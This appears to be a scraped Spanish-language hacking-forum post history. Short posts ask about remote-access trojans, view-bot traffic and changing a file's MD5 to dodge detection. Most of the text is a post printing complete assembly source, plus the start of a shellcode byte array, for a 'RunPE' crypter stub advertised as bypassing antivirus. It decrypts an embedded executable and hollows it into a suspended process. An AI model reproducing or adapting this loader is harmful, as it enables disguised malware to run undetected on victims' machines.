por curiosidad simplemente aunque la curiosidad mato al gato 
pero mi pregunta el h-worm va bien pero el cactus no conecta alguien sabe el motivo.
pero mi pregunta el h-worm va bien pero el cactus no conecta alguien sabe el motivo.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#22
Dudas y pedidos generales / rat diferente a quasar que tenga reverse proxy?
Abril 05, 2018, 01:40:37 PM
alguna aplicacion diferente a quasar tipo njrat que acepte reverse proxy?
#23
Dudas y pedidos generales / como poner la arroba en mi distribucion debian en cloudsigma?
Abril 05, 2018, 12:17:30 PM
Intento la arroba en mi vps probe todas las combinaciones teclas .. etc.. pero no me funciona. Cambiado el teclado y tampoco.
Alguien sabría como?
La pagina es.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login#
Alguien sabría como?
La pagina es.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login#
#24
Dudas y pedidos generales / Re:herramientas para buscar vulnerabilidades en paginas web
Abril 05, 2018, 07:21:27 AM
zeus scanner, v3nom, sqli dumper, havij, sqlmap.
#25
Dudas y pedidos generales / Re:Bot Para Tener Visitas en Youtube
Abril 04, 2018, 08:54:51 PM
Una pregunta @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Entonces los proxies no sirven para generar trafico en youtube y generar algun dinero? pero si usará pc's de verdad a lo mejor las visitas si serían validas?
#26
Dudas y pedidos generales / php que cambie el md5 de un fichero automaticamente?
Abril 04, 2018, 05:15:35 PM
pense en comprimirlo y ya ahi le cambio el md5, pero desde el exe seria posible? y automaticamente con visitas o cada x tiempo me lo cambie posible o no?
#27
ASM / RunPE NASM
Abril 04, 2018, 06:01:24 AM
Código:
Código: text
Código en shellcode:
Código: text
.386
.model flat,stdcall
Comment *
[ RunPE ShellCode Bypass AV ] - {Private}
[ Coded By Coldzer0 _ AT4RE ] - [Delphi - MASM Coder]
[ 2010 - 2011 ]
[Skype : coldzer01 ] - [Yahoo : [email protected] ]
[ Home : www.at4re.com - www.mtcoders.com ]
{
Usage : [Delphi]
Make Var with
var
RunPE : procedure(Buffer:PChar;BufferLen:DWORD); stdcall;
#### then in code call it like this #########
Begin
RunPE := @ShellCode[1];
RunPE(@TextFile[1],length(TextFile));
end;
}
*
.code
start:
PUSH EBP
MOV EBP,ESP
ADD ESP,-0378h
PUSH EBX
PUSH ESI
PUSH EDI
ASSUME FS:NOTHING
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX+28h] ; Get Module Path
;################# Extract Module Name [UNICODE] ####################
TEST EAX,EAX
AG:
MOV CX,WORD PTR DS:[EAX]
CMP CX,00h
JE OK
INC EAX
INC EAX
JMP AG
OK:
DEC EAX
DEC EAX
MOV CX,WORD PTR DS:[EAX]
CMP CX,5Ch ; '\'
JE OK2
JMP OK
OK2:
INC EAX
INC EAX
;################# Extract Module Name ####################
;################# Convert to UpperCase ####################
MOV CX,WORD PTR DS:[EAX]
CMP CX,61h
JS CHK
SUB EAX,2
XOR EDI,EDI
UP:
MOV CX,WORD PTR DS:[EAX]
INC EDI
CMP CX,39h
JS LO
SUB CX,20h
LO:
MOV WORD PTR DS:[EAX],CX
ADD EAX,2
CMP CX,0
JNE UP
SUB EAX,EDI
SUB EAX,EDI
;################# Convert to UpperCase ####################
;################# Check Module Name [Kernel32 [UNICODE]] ######################
CHK:
MOV CX,WORD PTR DS:[EAX]
CMP CX,4Bh ; K
JNZ AV
MOV CX,WORD PTR DS:[EAX+2h]
CMP ECX,45h ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+4h]
CMP ECX,52h ; R
JNZ AV
MOV CX,WORD PTR DS:[EAX+6h]
CMP ECX,4Eh ; N
JNZ AV
MOV CX,WORD PTR DS:[EAX+8h]
CMP ECX,45h ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ah]
CMP ECX,4Ch ; L
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ch]
CMP ECX,33h ; 3
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Eh]
CMP ECX,32h ; 2
JNZ AV
;********* Normal Mode *******
ASSUME FS:NOTHING
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX+18h]
JMP GO
;~~~~~~~~~~~ AV Mode ~~~~~~~~~~~
AV:
ASSUME FS:NOTHING
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX] ; First Module [AV]
MOV EAX,DWORD PTR DS:[EAX] ; For AV [Kernel is Second Module]
MOV EAX,DWORD PTR DS:[EAX+18h]
;################# Check Module Name ######################
GO:
MOV DWORD PTR SS:[EBP-4h],EAX ; Save Kernel Base
MOV BYTE PTR SS:[EBP-28h],47h
MOV BYTE PTR SS:[EBP-27h],50h
MOV BYTE PTR SS:[EBP-26h],41h
XOR EAX,EAX
MOV DWORD PTR SS:[EBP-14h],EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
MOV EAX,DWORD PTR DS:[EAX+3Ch]
ADD EAX,DWORD PTR SS:[EBP-4h]
MOV EDX,DWORD PTR DS:[EAX+78h]
MOV DWORD PTR SS:[EBP-44h],EDX
MOV EDX,DWORD PTR DS:[EAX+7Ch]
MOV DWORD PTR SS:[EBP-40h],EDX
MOV EAX,DWORD PTR SS:[EBP-4h]
ADD EAX,DWORD PTR SS:[EBP-44h]
MOV ESI,DWORD PTR DS:[EAX+18h]
DEC ESI
TEST ESI,ESI
JB LoadAPI
INC ESI
XOR EDX,EDX
LoopAPI:
MOV ECX,DWORD PTR DS:[EAX+20h]
ADD ECX,DWORD PTR SS:[EBP-4h]
MOV EBX,EDX
SHL EBX,2h
ADD ECX,EBX
MOV EDI,DWORD PTR DS:[ECX+0Ch]
ADD EDI,DWORD PTR SS:[EBP-4h]
MOV BL,BYTE PTR DS:[EDI]
CMP BL,BYTE PTR SS:[EBP-28h]
JNZ CheckAPI
MOV BL,BYTE PTR DS:[EDI+3h]
CMP BL,BYTE PTR SS:[EBP-27h]
JNZ CheckAPI
MOV CL,BYTE PTR DS:[EDI+7h]
CMP CL,BYTE PTR SS:[EBP-26h]
JNZ CheckAPI
MOV ECX,DWORD PTR DS:[EAX+24h]
ADD ECX,DWORD PTR SS:[EBP-4h]
MOV EBX,EDX
ADD EBX,EBX
ADD ECX,EBX
MOV CX,WORD PTR DS:[ECX]
ADD CX,3h
MOV EAX,DWORD PTR DS:[EAX+1Ch]
ADD EAX,DWORD PTR SS:[EBP-4h]
MOVZX ECX,CX
SHL ECX,2h
ADD EAX,ECX
MOV ESI,DWORD PTR DS:[EAX]
ADD ESI,DWORD PTR SS:[EBP-4h]
MOV DWORD PTR SS:[EBP-14h],ESI
JMP LoadAPI
CheckAPI:
INC EDX
DEC ESI
JNZ LoopAPI
LoadAPI: ; [ Write API To An Pointer - use later ]
MOV BYTE PTR SS:[EBP-69h],47h
MOV BYTE PTR SS:[EBP-68h],65h
MOV BYTE PTR SS:[EBP-67h],74h
MOV BYTE PTR SS:[EBP-66h],4Dh
MOV BYTE PTR SS:[EBP-65h],6Fh
MOV BYTE PTR SS:[EBP-64h],64h
MOV BYTE PTR SS:[EBP-63h],75h
MOV BYTE PTR SS:[EBP-62h],6Ch
MOV BYTE PTR SS:[EBP-61h],65h
MOV BYTE PTR SS:[EBP-60h],48h
MOV BYTE PTR SS:[EBP-5Fh],61h
MOV BYTE PTR SS:[EBP-5Eh],6Eh
MOV BYTE PTR SS:[EBP-5Dh],64h
MOV BYTE PTR SS:[EBP-5Ch],6Ch
MOV BYTE PTR SS:[EBP-5Bh],65h
MOV BYTE PTR SS:[EBP-5Ah],41h
MOV BYTE PTR SS:[EBP-59h],0h
MOV BYTE PTR SS:[EBP-7Ch],47h
MOV BYTE PTR SS:[EBP-7Bh],65h
MOV BYTE PTR SS:[EBP-7Ah],74h
MOV BYTE PTR SS:[EBP-79h],4Dh
MOV BYTE PTR SS:[EBP-78h],6Fh
MOV BYTE PTR SS:[EBP-77h],64h
MOV BYTE PTR SS:[EBP-76h],75h
MOV BYTE PTR SS:[EBP-75h],6Ch
MOV BYTE PTR SS:[EBP-74h],65h
MOV BYTE PTR SS:[EBP-73h],46h
MOV BYTE PTR SS:[EBP-72h],69h
MOV BYTE PTR SS:[EBP-71h],6Ch
MOV BYTE PTR SS:[EBP-70h],65h
MOV BYTE PTR SS:[EBP-6Fh],4Eh
MOV BYTE PTR SS:[EBP-6Eh],61h
MOV BYTE PTR SS:[EBP-6Dh],6Dh
MOV BYTE PTR SS:[EBP-6Ch],65h
MOV BYTE PTR SS:[EBP-6Bh],41h
MOV BYTE PTR SS:[EBP-6Ah],0h
MOV BYTE PTR SS:[EBP-91h],5Ah
MOV BYTE PTR SS:[EBP-90h],77h
MOV BYTE PTR SS:[EBP-8Fh],55h
MOV BYTE PTR SS:[EBP-8Eh],6Eh
MOV BYTE PTR SS:[EBP-8Dh],6Dh
MOV BYTE PTR SS:[EBP-8Ch],61h
MOV BYTE PTR SS:[EBP-8Bh],70h
MOV BYTE PTR SS:[EBP-8Ah],56h
MOV BYTE PTR SS:[EBP-89h],69h
MOV BYTE PTR SS:[EBP-88h],65h
MOV BYTE PTR SS:[EBP-87h],77h
MOV BYTE PTR SS:[EBP-86h],4Fh
MOV BYTE PTR SS:[EBP-85h],66h
MOV BYTE PTR SS:[EBP-84h],53h
MOV BYTE PTR SS:[EBP-83h],65h
MOV BYTE PTR SS:[EBP-82h],63h
MOV BYTE PTR SS:[EBP-81h],74h
MOV BYTE PTR SS:[EBP-80h],69h
MOV BYTE PTR SS:[EBP-7Fh],6Fh
MOV BYTE PTR SS:[EBP-7Eh],6Eh
MOV BYTE PTR SS:[EBP-7Dh],0h
MOV BYTE PTR SS:[EBP-0A0h],56h
MOV BYTE PTR SS:[EBP-9Fh],69h
MOV BYTE PTR SS:[EBP-9Eh],72h
MOV BYTE PTR SS:[EBP-9Dh],74h
MOV BYTE PTR SS:[EBP-9Ch],75h
MOV BYTE PTR SS:[EBP-9Bh],61h
MOV BYTE PTR SS:[EBP-9Ah],6Ch
MOV BYTE PTR SS:[EBP-99h],41h
MOV BYTE PTR SS:[EBP-98h],6Ch
MOV BYTE PTR SS:[EBP-97h],6Ch
MOV BYTE PTR SS:[EBP-96h],6Fh
MOV BYTE PTR SS:[EBP-95h],63h
MOV BYTE PTR SS:[EBP-94h],45h
MOV BYTE PTR SS:[EBP-93h],78h
MOV BYTE PTR SS:[EBP-92h],0h
MOV BYTE PTR SS:[EBP-0B1h],56h
MOV BYTE PTR SS:[EBP-0B0h],69h
MOV BYTE PTR SS:[EBP-0AFh],72h
MOV BYTE PTR SS:[EBP-0AEh],74h
MOV BYTE PTR SS:[EBP-0ADh],75h
MOV BYTE PTR SS:[EBP-0ACh],61h
MOV BYTE PTR SS:[EBP-0ABh],6Ch
MOV BYTE PTR SS:[EBP-0AAh],50h
MOV BYTE PTR SS:[EBP-0A9h],72h
MOV BYTE PTR SS:[EBP-0A8h],6Fh
MOV BYTE PTR SS:[EBP-0A7h],74h
MOV BYTE PTR SS:[EBP-0A6h],65h
MOV BYTE PTR SS:[EBP-0A5h],63h
MOV BYTE PTR SS:[EBP-0A4h],74h
MOV BYTE PTR SS:[EBP-0A3h],45h
MOV BYTE PTR SS:[EBP-0A2h],78h
MOV BYTE PTR SS:[EBP-0A1h],0h
MOV BYTE PTR SS:[EBP-0C3h],52h
MOV BYTE PTR SS:[EBP-0C2h],65h
MOV BYTE PTR SS:[EBP-0C1h],61h
MOV BYTE PTR SS:[EBP-0C0h],64h
MOV BYTE PTR SS:[EBP-0BFh],50h
MOV BYTE PTR SS:[EBP-0BEh],72h
MOV BYTE PTR SS:[EBP-0BDh],6Fh
MOV BYTE PTR SS:[EBP-0BCh],63h
MOV BYTE PTR SS:[EBP-0BBh],65h
MOV BYTE PTR SS:[EBP-0BAh],73h
MOV BYTE PTR SS:[EBP-0B9h],73h
MOV BYTE PTR SS:[EBP-0B8h],4Dh
MOV BYTE PTR SS:[EBP-0B7h],65h
MOV BYTE PTR SS:[EBP-0B6h],6Dh
MOV BYTE PTR SS:[EBP-0B5h],6Fh
MOV BYTE PTR SS:[EBP-0B4h],72h
MOV BYTE PTR SS:[EBP-0B3h],79h
MOV BYTE PTR SS:[EBP-0B2h],0h
MOV BYTE PTR SS:[EBP-0D6h],57h
MOV BYTE PTR SS:[EBP-0D5h],72h
MOV BYTE PTR SS:[EBP-0D4h],69h
MOV BYTE PTR SS:[EBP-0D3h],74h
MOV BYTE PTR SS:[EBP-0D2h],65h
MOV BYTE PTR SS:[EBP-0D1h],50h
MOV BYTE PTR SS:[EBP-0D0h],72h
MOV BYTE PTR SS:[EBP-0CFh],6Fh
MOV BYTE PTR SS:[EBP-0CEh],63h
MOV BYTE PTR SS:[EBP-0CDh],65h
MOV BYTE PTR SS:[EBP-0CCh],73h
MOV BYTE PTR SS:[EBP-0CBh],73h
MOV BYTE PTR SS:[EBP-0CAh],4Dh
MOV BYTE PTR SS:[EBP-0C9h],65h
MOV BYTE PTR SS:[EBP-0C8h],6Dh
MOV BYTE PTR SS:[EBP-0C7h],6Fh
MOV BYTE PTR SS:[EBP-0C6h],72h
MOV BYTE PTR SS:[EBP-0C5h],79h
MOV BYTE PTR SS:[EBP-0C4h],0h
MOV BYTE PTR SS:[EBP-0E7h],47h
MOV BYTE PTR SS:[EBP-0E6h],65h
MOV BYTE PTR SS:[EBP-0E5h],74h
MOV BYTE PTR SS:[EBP-0E4h],54h
MOV BYTE PTR SS:[EBP-0E3h],68h
MOV BYTE PTR SS:[EBP-0E2h],72h
MOV BYTE PTR SS:[EBP-0E1h],65h
MOV BYTE PTR SS:[EBP-0E0h],61h
MOV BYTE PTR SS:[EBP-0DFh],64h
MOV BYTE PTR SS:[EBP-0DEh],43h
MOV BYTE PTR SS:[EBP-0DDh],6Fh
MOV BYTE PTR SS:[EBP-0DCh],6Eh
MOV BYTE PTR SS:[EBP-0DBh],74h
MOV BYTE PTR SS:[EBP-0DAh],65h
MOV BYTE PTR SS:[EBP-0D9h],78h
MOV BYTE PTR SS:[EBP-0D8h],74h
MOV BYTE PTR SS:[EBP-0D7h],0h
MOV BYTE PTR SS:[EBP-0F8h],53h
MOV BYTE PTR SS:[EBP-0F7h],65h
MOV BYTE PTR SS:[EBP-0F6h],74h
MOV BYTE PTR SS:[EBP-0F5h],54h
MOV BYTE PTR SS:[EBP-0F4h],68h
MOV BYTE PTR SS:[EBP-0F3h],72h
MOV BYTE PTR SS:[EBP-0F2h],65h
MOV BYTE PTR SS:[EBP-0F1h],61h
MOV BYTE PTR SS:[EBP-0F0h],64h
MOV BYTE PTR SS:[EBP-0EFh],43h
MOV BYTE PTR SS:[EBP-0EEh],6Fh
MOV BYTE PTR SS:[EBP-0EDh],6Eh
MOV BYTE PTR SS:[EBP-0ECh],74h
MOV BYTE PTR SS:[EBP-0EBh],65h
MOV BYTE PTR SS:[EBP-0EAh],78h
MOV BYTE PTR SS:[EBP-0E9h],74h
MOV BYTE PTR SS:[EBP-0E8h],0h
MOV BYTE PTR SS:[EBP-0105h],52h
MOV BYTE PTR SS:[EBP-0104h],65h
MOV BYTE PTR SS:[EBP-0103h],73h
MOV BYTE PTR SS:[EBP-0102h],75h
MOV BYTE PTR SS:[EBP-0101h],6Dh
MOV BYTE PTR SS:[EBP-0100h],65h
MOV BYTE PTR SS:[EBP-0FFh],54h
MOV BYTE PTR SS:[EBP-0FEh],68h
MOV BYTE PTR SS:[EBP-0FDh],72h
MOV BYTE PTR SS:[EBP-0FCh],65h
MOV BYTE PTR SS:[EBP-0FBh],61h
MOV BYTE PTR SS:[EBP-0FAh],64h
MOV BYTE PTR SS:[EBP-0F9h],0h
MOV BYTE PTR SS:[EBP-01Eh],6Eh
MOV BYTE PTR SS:[EBP-01Dh],74h
MOV BYTE PTR SS:[EBP-01Ch],64h
MOV BYTE PTR SS:[EBP-01Bh],6Ch
MOV BYTE PTR SS:[EBP-01Ah],6Ch
MOV BYTE PTR SS:[EBP-019h],0h
MOV BYTE PTR SS:[EBP-0114h],43h
MOV BYTE PTR SS:[EBP-0113h],72h
MOV BYTE PTR SS:[EBP-0112h],65h
MOV BYTE PTR SS:[EBP-0111h],61h
MOV BYTE PTR SS:[EBP-0110h],74h
MOV BYTE PTR SS:[EBP-010Fh],65h
MOV BYTE PTR SS:[EBP-010Eh],50h
MOV BYTE PTR SS:[EBP-010Dh],72h
MOV BYTE PTR SS:[EBP-010Ch],6Fh
MOV BYTE PTR SS:[EBP-010Bh],63h
MOV BYTE PTR SS:[EBP-010Ah],65h
MOV BYTE PTR SS:[EBP-109h],73h
MOV BYTE PTR SS:[EBP-108h],73h
MOV BYTE PTR SS:[EBP-107h],41h
MOV BYTE PTR SS:[EBP-0106h],0h
MOV BYTE PTR SS:[EBP-121h],4Ch
MOV BYTE PTR SS:[EBP-120h],6Fh
MOV BYTE PTR SS:[EBP-11Fh],61h
MOV BYTE PTR SS:[EBP-11Eh],64h
MOV BYTE PTR SS:[EBP-11Dh],4Ch
MOV BYTE PTR SS:[EBP-11Ch],69h
MOV BYTE PTR SS:[EBP-11Bh],62h
MOV BYTE PTR SS:[EBP-11Ah],72h
MOV BYTE PTR SS:[EBP-119h],61h
MOV BYTE PTR SS:[EBP-118h],72h
MOV BYTE PTR SS:[EBP-117h],79h
MOV BYTE PTR SS:[EBP-116h],41h
MOV BYTE PTR SS:[EBP-115h],0h
LEA EAX,DWORD PTR SS:[EBP-121h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-18h],EAX
MOV ESI,DWORD PTR SS:[EBP+0Ch]
DEC ESI
TEST ESI,ESI
JL CheckLen
INC ESI
XOR EBX,EBX
DeCryptPE:
MOV EAX,DWORD PTR SS:[EBP+8h]
MOV AL,BYTE PTR DS:[EAX+EBX]
XOR AL,2Ah ; XOR Key 1 [ You Can Change It But Should Crypt the File with the New Keys ]
XOR AL,87h ; XOR Key 2
MOV EDX,DWORD PTR SS:[EBP+8h]
MOV BYTE PTR DS:[EDX+EBX],AL
INC EBX
DEC ESI
JNZ DeCryptPE
CheckLen:
MOV EAX,DWORD PTR SS:[EBP+8h]
MOV DWORD PTR SS:[EBP-54h],EAX
LEA EAX,DWORD PTR SS:[EBP-69h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
LEA EAX,DWORD PTR SS:[EBP-7Ch]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV ESI,EAX
PUSH 105
LEA EAX,DWORD PTR SS:[EBP-375h]
PUSH EAX
PUSH 0h
CALL EBX
PUSH EAX
CALL ESI
LEA EAX,DWORD PTR SS:[EBP-184h]
MOV EBX,43h
GetS4C:
MOV BYTE PTR DS:[EAX+EBX],0h
DEC EBX
CMP EBX,-1h
JNZ GetS4C
MOV DWORD PTR SS:[EBP-184h],44h
LEA EAX,DWORD PTR SS:[EBP-114h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
LEA EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
LEA EAX,DWORD PTR SS:[EBP-184h]
PUSH EAX
PUSH 0h
PUSH 0h
PUSH 4h
PUSH 0h
PUSH 0h
PUSH 0h
LEA EAX,DWORD PTR SS:[EBP-375h]
PUSH EAX
PUSH 0
CALL EBX
LEA EAX,DWORD PTR SS:[EBP-0E7h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
MOV DWORD PTR SS:[EBP-250h],10007h
LEA EAX,DWORD PTR SS:[EBP-250h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
LEA EAX,DWORD PTR SS:[EBP-0C3h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
LEA EAX,DWORD PTR SS:[EBP-30h]
PUSH EAX
PUSH 4h
LEA EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-1ACh]
ADD EAX,8h
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
LEA EAX,DWORD PTR SS:[EBP-91h]
PUSH EAX
LEA EAX,DWORD PTR SS:[EBP-1Eh]
PUSH EAX
CALL DWORD PTR SS:[EBP-18h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
MOV EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
MOV EAX,DWORD PTR SS:[EBP-54h]
MOV EAX,DWORD PTR DS:[EAX+3Ch]
ADD EAX,DWORD PTR SS:[EBP-54h]
MOV DWORD PTR SS:[EBP-2Ch],EAX
LEA EAX,DWORD PTR SS:[EBP-0A0h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
PUSH 40h
PUSH 3000h
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+50h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+34h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
MOV DWORD PTR SS:[EBP-38h],EAX
LEA EAX,DWORD PTR SS:[EBP-0D6h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-0Ch],EAX
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+54h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-54h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
MOV EAX,DWORD PTR SS:[EBP-2Ch]
LEA EDI,DWORD PTR DS:[EAX+18h]
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOVZX EAX,WORD PTR DS:[EAX+14h]
ADD EDI,EAX
LEA EAX,DWORD PTR SS:[EBP-0B1h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-8h],EAX
MOV DWORD PTR SS:[EBP-270h],1h
MOV DWORD PTR SS:[EBP-26Ch],10h
MOV DWORD PTR SS:[EBP-268h],2h
MOV DWORD PTR SS:[EBP-264h],20h
MOV DWORD PTR SS:[EBP-260h],4h
MOV DWORD PTR SS:[EBP-25Ch],40h
MOV DWORD PTR SS:[EBP-258h],4h
MOV DWORD PTR SS:[EBP-254h],40h
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOVZX ESI,WORD PTR DS:[EAX+6h]
DEC ESI
TEST ESI,ESI
JL CheckReadP
INC ESI
XOR EBX,EBX
ReadRPLoop:
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+10h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+14h]
ADD EAX,DWORD PTR SS:[EBP-54h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
ADD EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
LEA EAX,DWORD PTR SS:[EBP-3Ch]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+24h]
SHR EAX,1Dh
MOV EAX,DWORD PTR SS:[EBP+EAX*4h-270h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+8h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
ADD EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-8h]
INC EBX
DEC ESI
JNZ ReadRPLoop
CheckReadP:
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
PUSH 4h
LEA EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-1ACh]
ADD EAX,8h
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+28h]
ADD EAX,DWORD PTR SS:[EBP-38h]
MOV DWORD PTR SS:[EBP-1A0h],EAX
LEA EAX,DWORD PTR SS:[EBP-0F8h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
LEA EAX,DWORD PTR SS:[EBP-250h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
LEA EAX,DWORD PTR SS:[EBP-105h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
POP EDI
POP ESI
POP EBX
MOV ESP,EBP
POP EBP
RETN 8h
end startCódigo en shellcode:
NewRunPE {Bypass AV} : array [0..2376] of Byte =
(
$55,$8B,$EC,$81,$C4,$88,$FC,$FF,$FF,$53,$56,$57,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,
$00,$8B,$00,$8B,$40,$28,$85,$C0,$66,$8B,$08,$66,$83,$F9,$00,$74,$04,$40,$40,$EB,$F3,$48,$48,$66,$8B,
$08,$66,$83,$F9,$5C,$74,$02,$EB,$F3,$40,$40,$66,$8B,$08,$66,$83,$F9,$4B,$75,$54,$66,$8B,$48,$02,$83,
$F9,$45,$75,$4B,$66,$8B,$48,$04,$83,$F9,$52,$75,$42,$66,$8B,$48,$06,$83,$F9,$4E,$75,$39,$66,$8B,$48,
$08,$83,$F9,$45,$75,$30,$66,$8B,$48,$0A,$83,$F9,$4C,$75,$27,$66,$8B,$48,$0C,$83,$F9,$33,$75,$1E,$66,
$8B,$48,$0E,$83,$F9,$32,$75,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,
$40,$18,$EB,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$00,$8B,$40,$18,
$89,$45,$FC,$C6,$45,$D8,$47,$C6,$45,$D9,$50,$C6,$45,$DA,$41,$33,$C0,$89,$45,$EC,$8B,$45,$FC,$8B,$40,
$3C,$03,$45,$FC,$8B,$50,$78,$89,$55,$BC,$8B,$50,$7C,$89,$55,$C0,$8B,$45,$FC,$03,$45,$BC,$8B,$70,$18,
$4E,$85,$F6,$72,$5C,$46,$33,$D2,$8B,$48,$20,$03,$4D,$FC,$8B,$DA,$C1,$E3,$02,$03,$CB,$8B,$79,$0C,$03,
$7D,$FC,$8A,$1F,$3A,$5D,$D8,$75,$3B,$8A,$5F,$03,$3A,$5D,$D9,$75,$33,$8A,$4F,$07,$3A,$4D,$DA,$75,$2B,
$8B,$48,$24,$03,$4D,$FC,$8B,$DA,$03,$DB,$03,$CB,$66,$8B,$09,$66,$83,$C1,$03,$8B,$40,$1C,$03,$45,$FC,
$0F,$B7,$C9,$C1,$E1,$02,$03,$C1,$8B,$30,$03,$75,$FC,$89,$75,$EC,$EB,$04,$42,$4E,$75,$A7,$C6,$45,$97,
$47,$C6,$45,$98,$65,$C6,$45,$99,$74,$C6,$45,$9A,$4D,$C6,$45,$9B,$6F,$C6,$45,$9C,$64,$C6,$45,$9D,$75,
